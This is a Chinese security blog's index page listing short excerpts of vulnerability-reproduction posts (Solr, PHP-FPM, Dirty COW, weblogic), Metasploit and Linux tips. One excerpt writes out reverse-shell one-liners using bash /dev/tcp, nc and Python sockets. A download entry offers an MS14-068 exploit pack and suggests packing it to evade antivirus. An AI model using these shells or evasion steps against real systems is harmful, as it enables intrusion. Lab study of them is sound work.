自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Ping_Pig的博客

正在努力成为一个技术boy

  • 博客(16)
  • 资源 (3)
  • 收藏
  • 关注

原创 Apache Solr Velocity模板注入RCE漏洞复现

Solr简介:Solr是一个独立的企业级搜索应用服务器,它对外提供类似于web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引,也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。漏洞概述近日,国外安全研究员s00py公开了一个Apache Solr的Velocity模板注入的漏洞.该漏洞可以攻击最新版本的S...

2019-10-31 19:34:26 957 1

转载 kali启动后出现Resuming from hibernation错误

今天遇到一个问题,我笔记本长时间没有关掉,今天强制关机后重启发现无法进入GNOME桌面,一直提示Resuming from hibernation。解决办法如下:1:进入高级选择2:进入恢复模式3:输入开机密码:我今天遇到的问题是磁盘占满了,所以无法启动GNOME桌面。删除一些不必要的文件,保证磁盘空闲即可所用到的命令:df -h :查看磁盘挂载使用情况...

2019-10-28 22:41:14 668

原创 CVE-2019-11043 Nginx PHP 远程代码执行漏洞复现----自我学习

漏洞简介:来自Wallarm的安全研究员Andrew Danau在9月14-16号举办的Real World CTF中,意外的向服务器发送%0a(换行符)时,服务器返回异常信息。由此发现了这个0day漏洞,9月26日,PHP官方发布漏洞通告,其中指出,使用Nginx+php-fpm的服务器,在部分配置下,存在远程代码执行漏洞。并且该配置已被广泛使用,危害较大漏洞概述:Nginx上fas...

2019-10-27 15:33:15 2798

原创 Go语言安装环境

Go语言支持以下系统:Linux FreeBSD Mac OS X(也称为Darwin) Windows安装包下载地址:安装包下载地址为:https://golang.org/dl/。如果打不开可以使用这个地址:https://golang.google.cn/dl/。linux下安装步骤:1.下载安装包并解压到/usr/local目录下2。配置环境:vi ...

2019-10-27 14:43:33 270

原创 等级保护-定级原理及流程

定级原理级流程等级保护对象:基础信息网络 信息系统(工业系统,云计算平台,物联网,采用移动互联网技术的信息系统) 国家关键信息基础建设 客体 客观方面安全保护等级:第一级:等级保护对象受到损害后,会对公民,法人及组织造成损害,但不会对社会秩序,公共利益和国家安全造成损害 第二级:等级保护对象受到损害后,会对公民,法人及组织造成严重损害,对社会秩序,公共利益造成损害,但不对国...

2019-10-27 12:54:09 2258

原创 linux端口被占用解决命令

查找被占用的端口:netstat -tln |grep port查看该端口属于哪个进程lsof -i :prot杀掉占用端口的进程kill -9 进程id

2019-10-27 12:51:21 112

原创 linux下反弹shell的几种方式

实验环境:两台kali方法一:bash -i >& /dev/tcp/ip/port 0>&1nc -lvvp port方法二python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192...

2019-10-24 23:52:07 208

原创 脏牛Linux本地提权漏洞复现(CVE2016-5195)

漏洞介绍:脏牛漏洞(CVE2016-5195)是公开后影响范围最广和最深的漏洞之一,到2016被修复只十年来的每一个linux版本包括Android,桌面版和服务器版都受其影响。恶意攻击者可以轻易绕过常用的漏洞防御方法,对几百万用户进行攻击。国外安全公司Bindecy对该补丁和内容做出深入研究后发现补丁任然存在缺陷,由此还衍生出了“大脏牛”漏洞漏洞范围:Linux kernel &gt...

2019-10-24 22:18:42 676

原创 Centos下安装scp命令(顺带我安装gcc的命令)

测试时候,使用scp提示命令不存在,尝试yum -y install scp提示no package scp avaliable正确安装姿势:scp属于openssh-clients安装包,所以:yum -y install openssh-clientscentos6.2.32:安装gcc :yum -y install gcc...

2019-10-22 23:37:01 62

原创 中间件漏洞-weblogic

漏洞简介:weblogic是美国Oracle公司出品的一个applicationserver。确切的说是一个基于javaee架构的中间件,weblogic是用于开发、集成、部署和管理大型分布式web应用、网络应用和数据库应用的java应用服务器,将java的动态功能和java enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中反序列化漏洞cve2017-102...

2019-10-21 22:34:31 308

原创 linux中mvn命令的下载与安装

软件包地址:https://mirrors.cnnic.cn/apache/maven/Linux下安装maven1.首先到Maven官网下载安装文件,目前最新版本为3.0.3,下载文件为apache-maven-3.0.3-bin.tar.gz,下载可以使用wget命令;2.进入下载文件夹,找到下载的文件,运行如下命令解压tar -xvf apache-maven-2.2.1-bi...

2019-10-15 22:32:59 175

原创 web渗透的思路

我们在做测试之前脑子里面一定要思路健全,不管是遇到大型项目还是针对型测试一个站,我们的思路都是很重要的。信息收集:信息收集的重要性不多讲了,这里讲主要需要收集那些信息:服务器的相关信息(真实ip,系统类型,版本,开放端口,waf等)查看服务器的信息我们可以测试是否存在已知的漏洞,比如iis,apache,nginx,tomcat等的web中间件的通用漏洞网站指纹识别(cms,cdn...

2019-10-10 23:12:39 225

原创 Metaspolit工具详解

MSF简介:MSF(Metaspolit Framework)是一个开源工具,由Ruby语言编写的模板化框架,具有很好的扩展性.在这里示例以kali操作系统为基础kali上启动命令:systemctl start postgresql(开启数据库服务)msfconsole(启动msf服务)MSF基础MSF由多个模块组成:Auxiliaries:辅助模块 Ex...

2019-10-10 22:42:28 2970

原创 Python3 运算符----python学习之路

算术运算符:+:加-:减*:乘/:除%:取模**:幂-返回x的y次幂//:取整除-向下取接近除数的整数比较关系运算符:== :等于!=:不等于>:大于<:小于>=:大于等于<=:小于等于赋值运算符:算术运算符都可以在后面加这个”=“逻辑运算符:andornot位运算符:按位...

2019-10-09 23:15:27 37

原创 pychram的基本安装及环境解决

官网下载软件:https://www.jetbrains.com/pycharm/download/一共有两个版本:社区版和专业版,windows建议选择专业版下载号后双击软件开始安装:安装需要注意的几点:1:第一个需要勾选的地方默认安装:安装完成后以管理员身份运行、选择Do not import settings,之后选择OK,进入下一步下一步...

2019-10-09 22:11:22 417

原创 复现CVE2017-15715漏洞(Apache HTTPD 换行解析漏洞)

前言——首先我这是在前辈的经验上自己动手做了这次实验,全都仰仗前辈的经验总结。漏洞简介:apache httpd是一款http服务器,它可以通过mod_php来运行php网页,其中2.4.0~2.4.29版本中存在一个解析漏洞,在解析php时,1.php、0xa将被按照php后缀进行解析,导致绕过一些服务器的安全策略。复现:我是在kali环境下,预先已经装好了docker。不知...

2019-10-08 21:48:47 222

ew-master.zip

EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。 专有主页: http://rootkiter.com/EarthWorm/

2020-07-19

ms14-068利用工具包.zip

包含了minikatazx64位,以及MS14-068.exe和ms14-068.exe。工具可以放心使用。无后门,如果需要免杀可以自行混淆加壳

2020-07-01

BurpSuite安全测试工具

Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报

2020-06-23

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除